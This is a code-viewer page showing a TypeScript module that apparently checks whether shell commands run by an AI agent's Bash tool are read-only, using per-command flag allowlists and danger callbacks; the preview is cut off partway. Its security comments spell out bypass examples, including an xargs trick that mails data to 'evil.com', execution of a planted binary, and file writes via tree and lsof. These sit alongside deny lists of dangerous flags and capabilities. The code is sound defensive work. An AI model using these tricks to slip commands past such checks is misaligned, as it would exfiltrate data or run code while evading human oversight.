π File detail
tools/BashTool/readOnlyValidation.ts
𧩠.tsπ 1,991 linesπΎ 68,322 bytesπ text
β Back to All Filesπ― Use case
This module implements the βBashToolβ tool (Bash) β something the model can call at runtime alongside other agent tools. On the API surface it exposes isCommandSafeViaFlagParsing and checkReadOnlyConstraints β mainly functions, hooks, or classes. Dependencies touch schema validation. It composes internal code from bootstrap, utils, BashTool, bashPermissions, and bashSecurity (relative imports).
Generated from folder role, exports, dependency roots, and inline comments β not hand-reviewed for every path.
π§ Inline summary
import type { z } from 'zod/v4' import { getOriginalCwd } from '../../bootstrap/state.js' import { extractOutputRedirections, splitCommand_DEPRECATED,
π€ Exports (heuristic)
isCommandSafeViaFlagParsingcheckReadOnlyConstraints
π External import roots
Package roots from from "β¦" (relative paths omitted).
zod
π₯οΈ Source preview
import type { z } from 'zod/v4'
import { getOriginalCwd } from '../../bootstrap/state.js'
import {
extractOutputRedirections,
splitCommand_DEPRECATED,
} from '../../utils/bash/commands.js'
import { tryParseShellCommand } from '../../utils/bash/shellQuote.js'
import { getCwd } from '../../utils/cwd.js'
import { isCurrentDirectoryBareGitRepo } from '../../utils/git.js'
import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'
import { getPlatform } from '../../utils/platform.js'
import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js'
import {
containsVulnerableUncPath,
DOCKER_READ_ONLY_COMMANDS,
EXTERNAL_READONLY_COMMANDS,
type FlagArgType,
GH_READ_ONLY_COMMANDS,
GIT_READ_ONLY_COMMANDS,
PYRIGHT_READ_ONLY_COMMANDS,
RIPGREP_READ_ONLY_COMMANDS,
validateFlags,
} from '../../utils/shell/readOnlyCommandValidation.js'
import type { BashTool } from './BashTool.js'
import { isNormalizedGitCommand } from './bashPermissions.js'
import { bashCommandIsSafe_DEPRECATED } from './bashSecurity.js'
import {
COMMAND_OPERATION_TYPE,
PATH_EXTRACTORS,
type PathCommand,
} from './pathValidation.js'
import { sedCommandIsAllowedByAllowlist } from './sedValidation.js'
// Unified command validation configuration system
type CommandConfig = {
// A Record mapping from the command (e.g. `xargs` or `git diff`) to its safe flags and the values they accept
safeFlags: Record<string, FlagArgType>
// An optional regex that is used for additional validation beyond flag parsing
regex?: RegExp
// An optional callback for additional custom validation logic. Returns true if the command is dangerous,
// false if it appears to be safe. Meant to be used in conjunction with the safeFlags-based validation.
additionalCommandIsDangerousCallback?: (
rawCommand: string,
args: string[],
) => boolean
// When false, the tool does NOT respect POSIX `--` end-of-options.
// validateFlags will continue checking flags after `--` instead of breaking.
// Default: true (most tools respect `--`).
respectsDoubleDash?: boolean
}
// Shared safe flags for fd and fdfind (Debian/Ubuntu package name)
// SECURITY: -x/--exec and -X/--exec-batch are deliberately excluded β
// they execute arbitrary commands for each search result.
const FD_SAFE_FLAGS: Record<string, FlagArgType> = {
'-h': 'none',
'--help': 'none',
'-V': 'none',
'--version': 'none',
'-H': 'none',
'--hidden': 'none',
'-I': 'none',
'--no-ignore': 'none',
'--no-ignore-vcs': 'none',
'--no-ignore-parent': 'none',
'-s': 'none',
'--case-sensitive': 'none',
'-i': 'none',
'--ignore-case': 'none',
'-g': 'none',
'--glob': 'none',
'--regex': 'none',
'-F': 'none',
'--fixed-strings': 'none',
'-a': 'none',
'--absolute-path': 'none',
// SECURITY: -l/--list-details EXCLUDED β internally executes `ls` as subprocess (same
// pathway as --exec-batch). PATH hijacking risk if malicious `ls` is on PATH.
'-L': 'none',
'--follow': 'none',
'-p': 'none',
'--full-path': 'none',
'-0': 'none',
'--print0': 'none',
'-d': 'number',
'--max-depth': 'number',
'--min-depth': 'number',
'--exact-depth': 'number',
'-t': 'string',
'--type': 'string',
'-e': 'string',
'--extension': 'string',
'-S': 'string',
'--size': 'string',
'--changed-within': 'string',
'--changed-before': 'string',
'-o': 'string',
'--owner': 'string',
'-E': 'string',
'--exclude': 'string',
'--ignore-file': 'string',
'-c': 'string',
'--color': 'string',
'-j': 'number',
'--threads': 'number',
'--max-buffer-time': 'string',
'--max-results': 'number',
'-1': 'none',
'-q': 'none',
'--quiet': 'none',
'--show-errors': 'none',
'--strip-cwd-prefix': 'none',
'--one-file-system': 'none',
'--prune': 'none',
'--search-path': 'string',
'--base-directory': 'string',
'--path-separator': 'string',
'--batch-size': 'number',
'--no-require-git': 'none',
'--hyperlink': 'string',
'--and': 'string',
'--format': 'string',
}
// Central configuration for allowlist-based command validation
// All commands and flags here should only allow reading files. They should not
// allow writing to files, executing code, or creating network requests.
const COMMAND_ALLOWLIST: Record<string, CommandConfig> = {
xargs: {
safeFlags: {
'-I': '{}',
// SECURITY: `-i` and `-e` (lowercase) REMOVED β both use GNU getopt
// optional-attached-arg semantics (`i::`, `e::`). The arg MUST be
// attached (`-iX`, `-eX`); space-separated (`-i X`, `-e X`) means the
// flag takes NO arg and `X` becomes the next positional (target command).
//
// `-i` (`i::` β optional replace-str):
// echo /usr/sbin/sendm | xargs -it tail a@evil.com
// validator: -it bundle (both 'none') OK, tail β SAFE_TARGET β break
// GNU: -i replace-str=t, tail β /usr/sbin/sendmail β NETWORK EXFIL
//
// `-e` (`e::` β optional eof-str):
// cat data | xargs -e EOF echo foo
// validator: -e consumes 'EOF' as arg (type 'EOF'), echo β SAFE_TARGET
// GNU: -e no attached arg β no eof-str, 'EOF' is the TARGET COMMAND
// β executes binary named EOF from PATH β CODE EXEC (malicious repo)
//
// Use uppercase `-I {}` (mandatory arg) and `-E EOF` (POSIX, mandatory
// arg) instead β both validator and xargs agree on argument consumption.
// `-i`/`-e` are deprecated (GNU: "use -I instead" / "use -E instead").
'-n': 'number',
'-P': 'number',
'-L': 'number',
'-s': 'number',
'-E': 'EOF', // POSIX, MANDATORY separate arg β validator & xargs agree
'-0': 'none',
'-t': 'none',
'-r': 'none',
'-x': 'none',
'-d': 'char',
},
},
// All git read-only commands from shared validation map
...GIT_READ_ONLY_COMMANDS,
file: {
safeFlags: {
// Output format flags
'--brief': 'none',
'-b': 'none',
'--mime': 'none',
'-i': 'none',
'--mime-type': 'none',
'--mime-encoding': 'none',
'--apple': 'none',
// Behavior flags
'--check-encoding': 'none',
'-c': 'none',
'--exclude': 'string',
'--exclude-quiet': 'string',
'--print0': 'none',
'-0': 'none',
'-f': 'string',
'-F': 'string',
'--separator': 'string',
'--help': 'none',
'--version': 'none',
'-v': 'none',
// Following/dereferencing
'--no-dereference': 'none',
'-h': 'none',
'--dereference': 'none',
'-L': 'none',
// Magic file options (safe when just reading)
'--magic-file': 'string',
'-m': 'string',
// Other safe options
'--keep-going': 'none',
'-k': 'none',
'--list': 'none',
'-l': 'none',
'--no-buffer': 'none',
'-n': 'none',
'--preserve-date': 'none',
'-p': 'none',
'--raw': 'none',
'-r': 'none',
'-s': 'none',
'--special-files': 'none',
// Uncompress flag for archives
'--uncompress': 'none',
'-z': 'none',
},
},
sed: {
safeFlags: {
// Expression flags
'--expression': 'string',
'-e': 'string',
// Output control
'--quiet': 'none',
'--silent': 'none',
'-n': 'none',
// Extended regex
'--regexp-extended': 'none',
'-r': 'none',
'--posix': 'none',
'-E': 'none',
// Line handling
'--line-length': 'number',
'-l': 'number',
'--zero-terminated': 'none',
'-z': 'none',
'--separate': 'none',
'-s': 'none',
'--unbuffered': 'none',
'-u': 'none',
// Debugging/help
'--debug': 'none',
'--help': 'none',
'--version': 'none',
},
additionalCommandIsDangerousCallback: (
rawCommand: string,
_args: string[],
) => !sedCommandIsAllowedByAllowlist(rawCommand),
},
sort: {
safeFlags: {
// Sorting options
'--ignore-leading-blanks': 'none',
'-b': 'none',
'--dictionary-order': 'none',
'-d': 'none',
'--ignore-case': 'none',
'-f': 'none',
'--general-numeric-sort': 'none',
'-g': 'none',
'--human-numeric-sort': 'none',
'-h': 'none',
'--ignore-nonprinting': 'none',
'-i': 'none',
'--month-sort': 'none',
'-M': 'none',
'--numeric-sort': 'none',
'-n': 'none',
'--random-sort': 'none',
'-R': 'none',
'--reverse': 'none',
'-r': 'none',
'--sort': 'string',
'--stable': 'none',
'-s': 'none',
'--unique': 'none',
'-u': 'none',
'--version-sort': 'none',
'-V': 'none',
'--zero-terminated': 'none',
'-z': 'none',
// Key specifications
'--key': 'string',
'-k': 'string',
'--field-separator': 'string',
'-t': 'string',
// Checking
'--check': 'none',
'-c': 'none',
'--check-char-order': 'none',
'-C': 'none',
// Merging
'--merge': 'none',
'-m': 'none',
// Buffer size
'--buffer-size': 'string',
'-S': 'string',
// Parallel processing
'--parallel': 'number',
// Batch size
'--batch-size': 'number',
// Help and version
'--help': 'none',
'--version': 'none',
},
},
man: {
safeFlags: {
// Safe display options
'-a': 'none', // Display all manual pages
'--all': 'none', // Same as -a
'-d': 'none', // Debug mode
'-f': 'none', // Emulate whatis
'--whatis': 'none', // Same as -f
'-h': 'none', // Help
'-k': 'none', // Emulate apropos
'--apropos': 'none', // Same as -k
'-l': 'string', // Local file (safe for reading, Linux only)
'-w': 'none', // Display location instead of content
// Safe formatting options
'-S': 'string', // Restrict manual sections
'-s': 'string', // Same as -S for whatis/apropos mode
},
},
// help command - only allow bash builtin help flags to prevent attacks when
// help is aliased to man (e.g., in oh-my-zsh common-aliases plugin).
// man's -P flag allows arbitrary command execution via pager.
help: {
safeFlags: {
'-d': 'none', // Output short description for each topic
'-m': 'none', // Display usage in pseudo-manpage format
'-s': 'none', // Output only a short usage synopsis
},
},
netstat: {
safeFlags: {
// Safe display options
'-a': 'none', // Show all sockets
'-L': 'none', // Show listen queue sizes
'-l': 'none', // Print full IPv6 address
'-n': 'none', // Show network addresses as numbers
// Safe filtering options
'-f': 'string', // Address family (inet, inet6, unix, vsock)
// Safe interface options
'-g': 'none', // Show multicast group membership
'-i': 'none', // Show interface state
'-I': 'string', // Specific interface
// Safe statistics options
'-s': 'none', // Show per-protocol statistics
// Safe routing options
'-r': 'none', // Show routing tables
// Safe mbuf options
'-m': 'none', // Show memory management statistics
// Safe other options
'-v': 'none', // Increase verbosity
},
},
ps: {
safeFlags: {
// UNIX-style process selection (these are safe)
'-e': 'none', // Select all processes
'-A': 'none', // Select all processes (same as -e)
'-a': 'none', // Select all with tty except session leaders
'-d': 'none', // Select all except session leaders
'-N': 'none', // Negate selection
'--deselect': 'none',
// UNIX-style output format (safe, doesn't show env)
'-f': 'none', // Full format
'-F': 'none', // Extra full format
'-l': 'none', // Long format
'-j': 'none', // Jobs format
'-y': 'none', // Don't show flags
// Output modifiers (safe ones)
'-w': 'none', // Wide output
'-ww': 'none', // Unlimited width
'--width': 'number',
'-c': 'none', // Show scheduler info
'-H': 'none', // Show process hierarchy
'--forest': 'none',
'--headers': 'none',
'--no-headers': 'none',
'-n': 'string', // Set namelist file
'--sort': 'string',
// Thread display
'-L': 'none', // Show threads
'-T': 'none', // Show threads
'-m': 'none', // Show threads after processes
// Process selection by criteria
'-C': 'string', // By command name
'-G': 'string', // By real group ID
'-g': 'string', // By session or effective group
'-p': 'string', // By PID
'--pid': 'string',
'-q': 'string', // Quick mode by PID
'--quick-pid': 'string',
'-s': 'string', // By session ID
'--sid': 'string',
'-t': 'string', // By tty
'--tty': 'string',
'-U': 'string', // By real user ID
'-u': 'string', // By effective user ID
'--user': 'string',
// Help/version
'--help': 'none',
'--info': 'none',
'-V': 'none',
'--version': 'none',
},
// Block BSD-style 'e' modifier which shows environment variables
// BSD options are letter-only tokens without a leading dash
additionalCommandIsDangerousCallback: (
_rawCommand: string,
args: string[],
) => {
// Check for BSD-style 'e' in letter-only tokens (not -e which is UNIX-style)
// A BSD-style option is a token of only letters (no leading dash) containing 'e'
return args.some(
a => !a.startsWith('-') && /^[a-zA-Z]*e[a-zA-Z]*$/.test(a),
)
},
},
base64: {
respectsDoubleDash: false, // macOS base64 does not respect POSIX --
safeFlags: {
// Safe decode options
'-d': 'none', // Decode
'-D': 'none', // Decode (macOS)
'--decode': 'none', // Decode
// Safe formatting options
'-b': 'number', // Break lines at num (macOS)
'--break': 'number', // Break lines at num (macOS)
'-w': 'number', // Wrap lines at COLS (Linux)
'--wrap': 'number', // Wrap lines at COLS (Linux)
// Safe input options (read from file, not write)
'-i': 'string', // Input file (safe for reading)
'--input': 'string', // Input file (safe for reading)
// Safe misc options
'--ignore-garbage': 'none', // Ignore non-alphabet chars when decoding (Linux)
'-h': 'none', // Help
'--help': 'none', // Help
'--version': 'none', // Version
},
},
grep: {
safeFlags: {
// Pattern flags
'-e': 'string', // Pattern
'--regexp': 'string',
'-f': 'string', // File with patterns
'--file': 'string',
'-F': 'none', // Fixed strings
'--fixed-strings': 'none',
'-G': 'none', // Basic regexp (default)
'--basic-regexp': 'none',
'-E': 'none', // Extended regexp
'--extended-regexp': 'none',
'-P': 'none', // Perl regexp
'--perl-regexp': 'none',
// Matching control
'-i': 'none', // Ignore case
'--ignore-case': 'none',
'--no-ignore-case': 'none',
'-v': 'none', // Invert match
'--invert-match': 'none',
'-w': 'none', // Word regexp
'--word-regexp': 'none',
'-x': 'none', // Line regexp
'--line-regexp': 'none',
// Output control
'-c': 'none', // Count
'--count': 'none',
'--color': 'string',
'--colour': 'string',
'-L': 'none', // Files without match
'--files-without-match': 'none',
'-l': 'none', // Files with matches
'--files-with-matches': 'none',
'-m': 'number', // Max count
'--max-count': 'number',
'-o': 'none', // Only matching
'--only-matching': 'none',
'-q': 'none', // Quiet
'--quiet': 'none',
'--silent': 'none',
'-s': 'none', // No messages
'--no-messages': 'none',
// Output line prefix
'-b': 'none', // Byte offset
'--byte-offset': 'none',
'-H': 'none', // With filename
'--with-filename': 'none',
'-h': 'none', // No filename
'--no-filename': 'none',
'--label': 'string',
'-n': 'none', // Line number
'--line-number': 'none',
'-T': 'none', // Initial tab
'--initial-tab': 'none',
'-u': 'none', // Unix byte offsets
'--unix-byte-offsets': 'none',
'-Z': 'none', // Null after filename
'--null': 'none',
'-z': 'none', // Null data
'--null-data': 'none',
// Context control
'-A': 'number', // After context
'--after-context': 'number',
'-B': 'number', // Before context
'--before-context': 'number',
'-C': 'number', // Context
'--context': 'number',
'--group-separator': 'string',
'--no-group-separator': 'none',
// File and directory selection
'-a': 'none', // Text (process binary as text)
'--text': 'none',
'--binary-files': 'string',
'-D': 'string', // Devices
'--devices': 'string',
'-d': 'string', // Directories
'--directories': 'string',
'--exclude': 'string',
'--exclude-from': 'string',
'--exclude-dir': 'string',
'--include': 'string',
'-r': 'none', // Recursive
'--recursive': 'none',
'-R': 'none', // Dereference-recursive
'--dereference-recursive': 'none',
// Other options
'--line-buffered': 'none',
'-U': 'none', // Binary
'--binary': 'none',
// Help and version
'--help': 'none',
'-V': 'none',
'--version': 'none',
},
},
...RIPGREP_READ_ONLY_COMMANDS,
// Checksum commands - these only read files and compute/verify hashes
// All flags are safe as they only affect output format or verification behavior
sha256sum: {
safeFlags: {
// Mode flags
'-b': 'none', // Binary mode
'--binary': 'none',
'-t': 'none', // Text mode
'--text': 'none',
// Check/verify flags
'-c': 'none', // Verify checksums from file
'--check': 'none',
'--ignore-missing': 'none', // Ignore missing files during check
'--quiet': 'none', // Quiet mode during check
'--status': 'none', // Don't output, exit code shows success
'--strict': 'none', // Exit non-zero for improperly formatted lines
'-w': 'none', // Warn about improperly formatted lines
'--warn': 'none',
// Output format flags
'--tag': 'none', // BSD-style output
'-z': 'none', // End output lines with NUL
'--zero': 'none',
// Help and version
'--help': 'none',
'--version': 'none',
},
},
sha1sum: {
safeFlags: {
// Mode flags
'-b': 'none', // Binary mode
'--binary': 'none',
'-t': 'none', // Text mode
'--text': 'none',
// Check/verify flags
'-c': 'none', // Verify checksums from file
'--check': 'none',
'--ignore-missing': 'none', // Ignore missing files during check
'--quiet': 'none', // Quiet mode during check
'--status': 'none', // Don't output, exit code shows success
'--strict': 'none', // Exit non-zero for improperly formatted lines
'-w': 'none', // Warn about improperly formatted lines
'--warn': 'none',
// Output format flags
'--tag': 'none', // BSD-style output
'-z': 'none', // End output lines with NUL
'--zero': 'none',
// Help and version
'--help': 'none',
'--version': 'none',
},
},
md5sum: {
safeFlags: {
// Mode flags
'-b': 'none', // Binary mode
'--binary': 'none',
'-t': 'none', // Text mode
'--text': 'none',
// Check/verify flags
'-c': 'none', // Verify checksums from file
'--check': 'none',
'--ignore-missing': 'none', // Ignore missing files during check
'--quiet': 'none', // Quiet mode during check
'--status': 'none', // Don't output, exit code shows success
'--strict': 'none', // Exit non-zero for improperly formatted lines
'-w': 'none', // Warn about improperly formatted lines
'--warn': 'none',
// Output format flags
'--tag': 'none', // BSD-style output
'-z': 'none', // End output lines with NUL
'--zero': 'none',
// Help and version
'--help': 'none',
'--version': 'none',
},
},
// tree command - moved from READONLY_COMMAND_REGEXES to allow flags and path arguments
// -o/--output writes to a file, so it's excluded. All other flags are display/filter options.
tree: {
safeFlags: {
// Listing options
'-a': 'none', // All files
'-d': 'none', // Directories only
'-l': 'none', // Follow symlinks
'-f': 'none', // Full path prefix
'-x': 'none', // Stay on current filesystem
'-L': 'number', // Max depth
// SECURITY: -R REMOVED. tree -R combined with -H (HTML mode) and -L (depth)
// WRITES 00Tree.html files to every subdirectory at the depth boundary.
// From man tree (< 2.1.0): "-R β at each of them execute tree again
// adding `-o 00Tree.html` as a new option." The comment "Rerun at max
// depth" was misleading β the "rerun" includes a hardcoded -o file write.
// `tree -R -H . -L 2 /path` β writes /path/<subdir>/00Tree.html for each
// subdir at depth 2. FILE WRITE, zero permissions.
'-P': 'string', // Include pattern
'-I': 'string', // Exclude pattern
'--gitignore': 'none',
'--gitfile': 'string',
'--ignore-case': 'none',
'--matchdirs': 'none',
'--metafirst': 'none',
'--prune': 'none',
'--info': 'none',
'--infofile': 'string',
'--noreport': 'none',
'--charset': 'string',
'--filelimit': 'number',
// File display options
'-q': 'none', // Non-printable as ?
'-N': 'none', // Non-printable as-is
'-Q': 'none', // Quote filenames
'-p': 'none', // Protections
'-u': 'none', // Owner
'-g': 'none', // Group
'-s': 'none', // Size bytes
'-h': 'none', // Human-readable sizes
'--si': 'none',
'--du': 'none',
'-D': 'none', // Last modification time
'--timefmt': 'string',
'-F': 'none', // Append indicator
'--inodes': 'none',
'--device': 'none',
// Sorting options
'-v': 'none', // Version sort
'-t': 'none', // Sort by mtime
'-c': 'none', // Sort by ctime
'-U': 'none', // Unsorted
'-r': 'none', // Reverse sort
'--dirsfirst': 'none',
'--filesfirst': 'none',
'--sort': 'string',
// Graphics/output options
'-i': 'none', // No indentation lines
'-A': 'none', // ANSI line graphics
'-S': 'none', // CP437 line graphics
'-n': 'none', // No color
'-C': 'none', // Color
'-X': 'none', // XML output
'-J': 'none', // JSON output
'-H': 'string', // HTML output with base HREF
'--nolinks': 'none',
'--hintro': 'string',
'--houtro': 'string',
'-T': 'string', // HTML title
'--hyperlink': 'none',
'--scheme': 'string',
'--authority': 'string',
// Input options (read from file, not write)
'--fromfile': 'none',
'--fromtabfile': 'none',
'--fflinks': 'none',
// Help and version
'--help': 'none',
'--version': 'none',
},
},
// date command - moved from READONLY_COMMANDS because -s/--set can set system time
// Also -f/--file can be used to read dates from file and set time
// We only allow safe display options
date: {
safeFlags: {
// Display options (safe - don't modify system time)
'-d': 'string', // --date=STRING - display time described by STRING
'--date': 'string',
'-r': 'string', // --reference=FILE - display file's modification time
'--reference': 'string',
'-u': 'none', // --utc - use UTC
'--utc': 'none',
'--universal': 'none',
// Output format options
'-I': 'none', // --iso-8601 (can have optional argument, but none type handles bare flag)
'--iso-8601': 'string',
'-R': 'none', // --rfc-email
'--rfc-email': 'none',
'--rfc-3339': 'string',
// Debug/help
'--debug': 'none',
'--help': 'none',
'--version': 'none',
},
// Dangerous flags NOT included (blocked by omission):
// -s / --set - sets system time
// -f / --file - reads dates from file (can be used to set time in batch)
// CRITICAL: date positional args in format MMDDhhmm[[CC]YY][.ss] set system time
// Use callback to verify positional args start with + (format strings like +"%Y-%m-%d")
additionalCommandIsDangerousCallback: (
_rawCommand: string,
args: string[],
) => {
// args are already parsed tokens after "date"
// Flags that require an argument
const flagsWithArgs = new Set([
'-d',
'--date',
'-r',
'--reference',
'--iso-8601',
'--rfc-3339',
])
let i = 0
while (i < args.length) {
const token = args[i]!
// Skip flags and their arguments
if (token.startsWith('--') && token.includes('=')) {
// Long flag with =value, already consumed
i++
} else if (token.startsWith('-')) {
// Flag - check if it takes an argument
if (flagsWithArgs.has(token)) {
i += 2 // Skip flag and its argument
} else {
i++ // Just skip the flag
}
} else {
// Positional argument - must start with + for format strings
// Anything else (like MMDDhhmm) could set system time
if (!token.startsWith('+')) {
return true // Dangerous
}
i++
}
}
return false // Safe
},
},
// hostname command - moved from READONLY_COMMANDS because positional args set hostname
// Also -F/--file sets hostname from file, -b/--boot sets default hostname
// We only allow safe display options and BLOCK any positional arguments
hostname: {
safeFlags: {
// Display options only (safe)
'-f': 'none', // --fqdn - display FQDN
'--fqdn': 'none',
'--long': 'none',
'-s': 'none', // --short - display short name
'--short': 'none',
'-i': 'none', // --ip-address
'--ip-address': 'none',
'-I': 'none', // --all-ip-addresses
'--all-ip-addresses': 'none',
'-a': 'none', // --alias
'--alias': 'none',
'-d': 'none', // --domain
'--domain': 'none',
'-A': 'none', // --all-fqdns
'--all-fqdns': 'none',
'-v': 'none', // --verbose
'--verbose': 'none',
'-h': 'none', // --help
'--help': 'none',
'-V': 'none', // --version
'--version': 'none',
},
// CRITICAL: Block any positional arguments - they set the hostname
// Also block -F/--file, -b/--boot, -y/--yp/--nis (not in safeFlags = blocked)
// Use regex to ensure no positional args after flags
regex: /^hostname(?:\s+(?:-[a-zA-Z]|--[a-zA-Z-]+))*\s*$/,
},
// info command - moved from READONLY_COMMANDS because -o/--output writes to files
// Also --dribble writes keystrokes to file, --init-file loads custom config
// We only allow safe display/navigation options
info: {
safeFlags: {
// Navigation/display options (safe)
'-f': 'string', // --file - specify manual file to read
'--file': 'string',
'-d': 'string', // --directory - search path
'--directory': 'string',
'-n': 'string', // --node - specify node
'--node': 'string',
'-a': 'none', // --all
'--all': 'none',
'-k': 'string', // --apropos - search
'--apropos': 'string',
'-w': 'none', // --where - show location
'--where': 'none',
'--location': 'none',
'--show-options': 'none',
'--vi-keys': 'none',
'--subnodes': 'none',
'-h': 'none',
'--help': 'none',
'--usage': 'none',
'--version': 'none',
},
// Dangerous flags NOT included (blocked by omission):
// -o / --output - writes output to file
// --dribble - records keystrokes to file
// --init-file - loads custom config (potential code execution)
// --restore - replays keystrokes from file
},
lsof: {
safeFlags: {
'-?': 'none',
'-h': 'none',
'-v': 'none',
'-a': 'none',
'-b': 'none',
'-C': 'none',
'-l': 'none',
'-n': 'none',
'-N': 'none',
'-O': 'none',
'-P': 'none',
'-Q': 'none',
'-R': 'none',
'-t': 'none',
'-U': 'none',
'-V': 'none',
'-X': 'none',
'-H': 'none',
'-E': 'none',
'-F': 'none',
'-g': 'none',
'-i': 'none',
'-K': 'none',
'-L': 'none',
'-o': 'none',
'-r': 'none',
'-s': 'none',
'-S': 'none',
'-T': 'none',
'-x': 'none',
'-A': 'string',
'-c': 'string',
'-d': 'string',
'-e': 'string',
'-k': 'string',
'-p': 'string',
'-u': 'string',
// OMITTED (writes to disk): -D (device cache file build/update)
},
// Block +m (create mount supplement file) β writes to disk.
// +prefix flags are treated as positional args by validateFlags,
// so we must catch them here. lsof accepts +m<path> (attached path, no space)
// with both absolute (+m/tmp/evil) and relative (+mfoo, +m.evil) paths.
additionalCommandIsDangerousCallback: (_rawCommand, args) =>
args.some(a => a === '+m' || a.startsWith('+m')),
},
pgrep: {
safeFlags: {
'-d': 'string',
'--delimiter': 'string',
'-l': 'none',
'--list-name': 'none',
'-a': 'none',
'--list-full': 'none',
'-v': 'none',
'--inverse': 'none',
'-w': 'none',
'--lightweight': 'none',
'-c': 'none',
'--count': 'none',
'-f': 'none',
'--full': 'none',
'-g': 'string',
'--pgroup': 'string',
'-G': 'string',
'--group': 'string',
'-i': 'none',
'--ignore-case': 'none',
'-n': 'none',
'--newest': 'none',
'-o': 'none',
'--oldest': 'none',
'-O': 'string',
'--older': 'string',
'-P': 'string',
'--parent': 'string',
'-s': 'string',
'--session': 'string',
'-t': 'string',
'--terminal': 'string',
'-u': 'string',
'--euid': 'string',
'-U': 'string',
'--uid': 'string',
'-x': 'none',
'--exact': 'none',
'-F': 'string',
'--pidfile': 'string',
'-L': 'none',
'--logpidfile': 'none',
'-r': 'string',
'--runstates': 'string',
'--ns': 'string',
'--nslist': 'string',
'--help': 'none',
'-V': 'none',
'--version': 'none',
},
},
tput: {
safeFlags: {
'-T': 'string',
'-V': 'none',
'-x': 'none',
// SECURITY: -S (read capability names from stdin) deliberately EXCLUDED.
// It must NOT be in safeFlags because validateFlags unbundles combined
// short flags (e.g., -xS β -x + -S), but the callback receives the raw
// token '-xS' and only checks exact match 'token === "-S"'. Excluding -S
// from safeFlags ensures validateFlags rejects it (bundled or not) before
// the callback runs. The callback's -S check is defense-in-depth.
},
additionalCommandIsDangerousCallback: (
_rawCommand: string,
args: string[],
) => {
// Capabilities that modify terminal state or could be harmful.
// init/reset run iprog (arbitrary code from terminfo) and modify tty settings.
// rs1/rs2/rs3/is1/is2/is3 are the individual reset/init sequences that
// init/reset invoke internally β rs1 sends ESC c (full terminal reset).
// clear erases scrollback (evidence destruction). mc5/mc5p activate media copy
// (redirect output to printer device). smcup/rmcup manipulate screen buffer.
// pfkey/pfloc/pfx/pfxl program function keys β pfloc executes strings locally.
// rf is reset file (analogous to if/init_file).
const DANGEROUS_CAPABILITIES = new Set([
'init',
'reset',
'rs1',
'rs2',
'rs3',
'is1',
'is2',
'is3',
'iprog',
'if',
'rf',
'clear',
'flash',
'mc0',
'mc4',
'mc5',
'mc5i',
'mc5p',
'pfkey',
'pfloc',
'pfx',
'pfxl',
'smcup',
'rmcup',
])
const flagsWithArgs = new Set(['-T'])
let i = 0
let afterDoubleDash = false
while (i < args.length) {
const token = args[i]!
if (token === '--') {
afterDoubleDash = true
i++
} else if (!afterDoubleDash && token.startsWith('-')) {
// Defense-in-depth: block -S even if it somehow passes validateFlags
if (token === '-S') return true
// Also check for -S bundled with other flags (e.g., -xS)
if (
!token.startsWith('--') &&
token.length > 2 &&
token.includes('S')
)
return true
if (flagsWithArgs.has(token)) {
i += 2
} else {
i++
}
} else {
if (DANGEROUS_CAPABILITIES.has(token)) return true
i++
}
}
return false
},
},
// ss β socket statistics (iproute2). Read-only query tool equivalent to netstat.
// SECURITY: -K/--kill (forcibly close sockets) and -D/--diag (dump raw data to file)
// are deliberately excluded. -F/--filter (read filter from file) also excluded.
ss: {
safeFlags: {
'-h': 'none',
'--help': 'none',
'-V': 'none',
'--version': 'none',
'-n': 'none',
'--numeric': 'none',
'-r': 'none',
'--resolve': 'none',
'-a': 'none',
'--all': 'none',
'-l': 'none',
'--listening': 'none',
'-o': 'none',
'--options': 'none',
'-e': 'none',
'--extended': 'none',
'-m': 'none',
'--memory': 'none',
'-p': 'none',
'--processes': 'none',
'-i': 'none',
'--info': 'none',
'-s': 'none',
'--summary': 'none',
'-4': 'none',
'--ipv4': 'none',
'-6': 'none',
'--ipv6': 'none',
'-0': 'none',
'--packet': 'none',
'-t': 'none',
'--tcp': 'none',
'-M': 'none',
'--mptcp': 'none',
'-S': 'none',
'--sctp': 'none',
'-u': 'none',
'--udp': 'none',
'-d': 'none',
'--dccp': 'none',
'-w': 'none',
'--raw': 'none',
'-x': 'none',
'--unix': 'none',
'--tipc': 'none',
'--vsock': 'none',
'-f': 'string',
'--family': 'string',
'-A': 'string',
'--query': 'string',
'--socket': 'string',
'-Z': 'none',
'--context': 'none',
'-z': 'none',
'--contexts': 'none',
// SECURITY: -N/--net EXCLUDED β performs setns(), unshare(), mount(), umount()
// to switch network namespace. While isolated to forked process, too invasive.
'-b': 'none',
'--bpf': 'none',
'-E': 'none',
'--events': 'none',
'-H': 'none',
'--no-header': 'none',
'-O': 'none',
'--oneline': 'none',
'--tipcinfo': 'none',
'--tos': 'none',
'--cgroup': 'none',
'--inet-sockopt': 'none',
// SECURITY: -K/--kill EXCLUDED β forcibly closes sockets
// SECURITY: -D/--diag EXCLUDED β dumps raw TCP data to a file
// SECURITY: -F/--filter EXCLUDED β reads filter expressions from a file
},
},
// fd/fdfind β fast file finder (fd-find). Read-only search tool.
// SECURITY: -x/--exec (execute command per result) and -X/--exec-batch
// (execute command with all results) are deliberately excluded.
fd: { safeFlags: { ...FD_SAFE_FLAGS } },
// fdfind is the Debian/Ubuntu package name for fd β same binary, same flags
fdfind: { safeFlags: { ...FD_SAFE_FLAGS } },
...PYRIGHT_READ_ONLY_COMMANDS,
...DOCKER_READ_ONLY_COMMANDS,
}
// gh commands are ant-only since they make network requests, which goes against
// the read-only validation principle of no network access
const ANT_ONLY_COMMAND_ALLOWLIST: Record<string, CommandConfig> = {
// All gh read-only commands from shared validation map
...GH_READ_ONLY_COMMANDS,
// aki β Anthropic internal knowledge-base search CLI.
// Network read-only (same policy as gh). --audit-csv omitted: writes to disk.
aki: {
safeFlags: {
'-h': 'none',
'--help': 'none',
'-k': 'none',
'--keyword': 'none',
'-s': 'none',
'--semantic': 'none',
'--no-adaptive': 'none',
'-n': 'number',
'--limit': 'number',
'-o': 'number',
'--offset': 'number',
'--source': 'string',
'--exclude-source': 'string',
'-a': 'string',
'--after': 'string',
'-b': 'string',
'--before': 'string',
'--collection': 'string',
'--drive': 'string',
'--folder': 'string',
'--descendants': 'none',
'-m': 'string',
'--meta': 'string',
'-t': 'string',
'--threshold': 'string',
'--kw-weight': 'string',
'--sem-weight': 'string',
'-j': 'none',
'--json': 'none',
'-c': 'none',
'--chunk': 'none',
'--preview': 'none',
'-d': 'none',
'--full-doc': 'none',
'-v': 'none',
'--verbose': 'none',
'--stats': 'none',
'-S': 'number',
'--summarize': 'number',
'--explain': 'none',
